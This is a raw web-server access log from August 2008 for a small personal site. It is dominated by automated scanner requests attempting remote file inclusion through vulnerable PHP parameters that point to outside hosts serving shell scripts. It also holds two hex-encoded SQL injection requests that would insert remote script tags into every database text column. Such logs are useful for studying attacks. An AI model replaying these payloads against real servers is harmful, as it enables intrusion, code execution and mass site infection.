88.84.132.4 - - [17/Aug/2008:01:56:59 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:57:47 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:57:47 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
200.155.18.50 - - [17/Aug/2008:01:57:49 -0500] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
67.195.37.153 - - [17/Aug/2008:01:57:54 -0500] "GET /costume/thmb6.htm HTTP/1.0" 200 3118 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
69.61.106.55 - - [17/Aug/2008:01:58:21 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:01:58:21 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:01:58:30 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.812"
69.61.106.55 - - [17/Aug/2008:01:58:30 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://matrix-computers.net//language/Za/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.812"
88.84.132.4 - - [17/Aug/2008:01:58:34 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:01:58:34 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
65.214.44.28 - - [17/Aug/2008:01:59:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
65.214.44.28 - - [17/Aug/2008:01:59:22 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [17/Aug/2008:01:59:22 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [17/Aug/2008:01:59:22 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [17/Aug/2008:01:59:22 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [17/Aug/2008:01:59:22 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
65.214.44.28 - - [17/Aug/2008:01:59:22 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
91.186.30.30 - - [17/Aug/2008:01:59:41 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:01:59:41 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:01:59:58 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:01:59:58 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:01:59:58 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
67.15.186.5 - - [17/Aug/2008:02:01:06 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:01:06 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:01:10 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:01:10 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:01:10 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
218.38.12.93 - - [17/Aug/2008:02:02:55 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
218.38.12.93 - - [17/Aug/2008:02:02:56 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
91.186.30.30 - - [17/Aug/2008:02:03:26 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:02:03:27 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
74.6.22.107 - - [17/Aug/2008:02:03:39 -0500] "GET /logs/access_log.1202428800 HTTP/1.0" 200 317084 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.230.21.231 - - [17/Aug/2008:02:06:18 -0500] "GET /logs/access_log.1206230400//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://marancia.altervista.org/NuovaCartella/pino.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
87.230.21.231 - - [17/Aug/2008:02:06:18 -0500] "GET //claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://marancia.altervista.org/NuovaCartella/pino.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
87.230.21.231 - - [17/Aug/2008:02:06:18 -0500] "GET /logs//claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=http://marancia.altervista.org/NuovaCartella/pino.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
64.26.63.11 - - [17/Aug/2008:02:06:25 -0500] "GET /logs/access_log.1214438400//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
64.26.63.11 - - [17/Aug/2008:02:06:25 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.803"
64.26.63.11 - - [17/Aug/2008:02:06:26 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
88.84.132.4 - - [17/Aug/2008:02:06:32 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
209.59.164.114 - - [17/Aug/2008:02:06:33 -0500] "GET /logs/access_log.1214438400%20//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/readme.txt???? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
88.84.132.4 - - [17/Aug/2008:02:06:33 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:06:58 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:06:58 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:07:37 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:07:37 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:07:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:07:37 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
91.186.30.30 - - [17/Aug/2008:02:08:25 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:02:08:25 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:02:08:33 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
91.186.30.30 - - [17/Aug/2008:02:08:33 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
74.52.139.226 - - [17/Aug/2008:02:09:16 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
74.52.139.226 - - [17/Aug/2008:02:09:16 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
74.52.139.226 - - [17/Aug/2008:02:09:16 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
213.33.84.163 - - [17/Aug/2008:02:10:09 -0500] "GET /logs/access_log.1214438400//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
213.33.84.163 - - [17/Aug/2008:02:10:09 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
213.33.84.163 - - [17/Aug/2008:02:10:10 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
200.155.18.50 - - [17/Aug/2008:02:11:01 -0500] "GET /logs/access_log.1214438400//oneadmin/config.php?path[docroot]=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
200.155.18.50 - - [17/Aug/2008:02:11:01 -0500] "GET //oneadmin/config.php?path[docroot]=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
200.155.18.50 - - [17/Aug/2008:02:11:01 -0500] "GET /logs//oneadmin/config.php?path[docroot]=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
67.15.186.5 - - [17/Aug/2008:02:11:47 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
88.84.132.4 - - [17/Aug/2008:02:11:50 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:11:50 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:11:50 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:11:50 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
217.25.160.1 - - [17/Aug/2008:02:11:52 -0500] "GET /logs/access_log.1213488000//playing.php/common/db.php?commonpath=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
200.155.18.50 - - [17/Aug/2008:02:12:03 -0500] "GET /logs/access_log.1214438400%20//oneadmin/config.php?path[docroot]=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
67.15.186.5 - - [17/Aug/2008:02:12:06 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:12:06 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:12:13 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:12:14 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
64.26.63.11 - - [17/Aug/2008:02:12:44 -0500] "GET /logs/poll_vote.php?relativer_pfad=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
64.26.63.11 - - [17/Aug/2008:02:12:44 -0500] "GET /poll_vote.php?relativer_pfad=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
91.186.30.30 - - [17/Aug/2008:02:13:11 -0500] "GET /logs/access_log.1214438400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.808"
139.146.145.67 - - [17/Aug/2008:02:14:55 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:14:56 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
88.84.132.4 - - [17/Aug/2008:02:15:40 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
88.84.132.4 - - [17/Aug/2008:02:15:40 -0500] "GET //include/admin.lib.inc.php?site_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:02:17:47 -0500] "GET /logs/access_log.1214438400//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:02:17:49 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:02:17:52 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
213.33.84.163 - - [17/Aug/2008:02:19:48 -0500] "GET /logs/poll_vote.php?relativer_pfad=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
213.33.84.163 - - [17/Aug/2008:02:19:48 -0500] "GET /poll_vote.php?relativer_pfad=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
213.80.190.246 - - [17/Aug/2008:02:19:49 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
213.80.190.246 - - [17/Aug/2008:02:19:49 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
213.80.190.246 - - [17/Aug/2008:02:19:50 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.topyn.com/bajo.txt????? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
203.88.114.169 - - [17/Aug/2008:02:19:52 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://h1.ripway.com/saviours/cmd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
203.88.114.169 - - [17/Aug/2008:02:19:53 -0500] "GET /index.php?DOCUMENT_ROOT=http://h1.ripway.com/saviours/cmd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
67.15.186.5 - - [17/Aug/2008:02:20:16 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:20:16 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
139.146.145.67 - - [17/Aug/2008:02:21:24 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
139.146.145.67 - - [17/Aug/2008:02:21:24 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
24.127.233.75 - - [17/Aug/2008:02:21:27 -0500] "GET /logs/access_log.1202601600?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 236775 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Comcast Install 1.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)"
24.127.233.75 - - [17/Aug/2008:02:21:34 -0500] "GET /logs/access_log.1202601600?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 236775 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; Comcast Install 1.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)"
216.180.241.37 - - [17/Aug/2008:02:22:23 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 340 "-""libwww-perl/5.810"
216.180.241.37 - - [17/Aug/2008:02:22:23 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
216.180.241.37 - - [17/Aug/2008:02:22:23 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.topyn.com/ips.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
62.109.176.109 - - [17/Aug/2008:02:22:54 -0500] "GET /logs/access_log.1206230400/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:02:22:57 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
62.109.176.109 - - [17/Aug/2008:02:22:59 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
139.146.145.67 - - [17/Aug/2008:02:23:21 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
74.6.22.107 - - [17/Aug/2008:02:24:02 -0500] "GET /logs/access_log.1173916800 HTTP/1.0" 200 147682 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.15.186.5 - - [17/Aug/2008:02:24:31 -0500] "GET /logs/access_log.1214438400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://hosturk.net/adm/id.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
200.251.46.29 - - [17/Aug/2008:02:25:18 -0500] "GET /logs/poll_vote.php?relativer_pfad=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
200.251.46.29 - - [17/Aug/2008:02:25:19 -0500] "GET /poll_vote.php?relativer_pfad=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
66.197.234.53 - - [17/Aug/2008:02:26:09 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.813"
66.197.234.53 - - [17/Aug/2008:02:26:09 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.813"
66.197.234.53 - - [17/Aug/2008:02:26:20 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.813"
66.197.234.53 - - [17/Aug/2008:02:26:21 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.813"
89.186.1.54 - - [17/Aug/2008:02:26:32 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.800"
89.186.1.54 - - [17/Aug/2008:02:26:32 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.800"
67.15.186.5 - - [17/Aug/2008:02:29:46 -0500] "GET /logs/access_log.1214524800//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:29:46 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.65"
67.15.186.5 - - [17/Aug/2008:02:29:46 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.65"
